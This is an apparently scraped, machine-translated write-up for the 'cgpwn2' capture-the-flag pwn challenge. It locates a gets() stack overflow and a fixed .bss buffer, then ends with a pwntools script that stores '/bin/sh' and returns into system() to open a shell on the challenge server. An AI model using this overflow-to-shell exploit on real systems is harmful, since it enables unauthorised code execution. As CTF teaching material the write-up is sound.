pwn the cgpwn2

Others 2020-01-14 10:36:50 views: null

0x01 looking for loopholes

checksec

Here Insert Picture Description

ida analysis

Here Insert Picture Description
Enter hello () function
Here Insert Picture Description
exist get () function stack overflow
Here Insert Picture Description

  • name in the bss section, fixed address
  • Fgets function which can be used to write stuff
  • When calling the system function, but not / bin / sh

0x02 analyzed using

By stack overflow, call system function, and write "/ bin / sh" in the name, the address of the parameter is set to name the first address, you can getshell the

0x03 attack

#!usr/bin/python
from pwn import *

io = remote("111.198.29.45",37884)
# io = process("./cgpwn2")

context.log_level = 'debug'

sys_addr = 0x08048420

io.recvuntil("your name")
io.sendline("/bin/sh")

bin_sh_addr = 0x0804A080

io.recvuntil("leave some message here:")
payload  = "a" * 0x26 + "aaaa" + p32(sys_addr) + "aaaa" + p32(bin_sh_addr)


io.sendline(payload)

io.interactive()
Black feather Lan Cang sangrakwol
Published 17 original articles · won praise 1 · views 470
Private letter concerns

Guess you like

Origin blog.csdn.net/qq_43430261/article/details/102684035
pwn
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com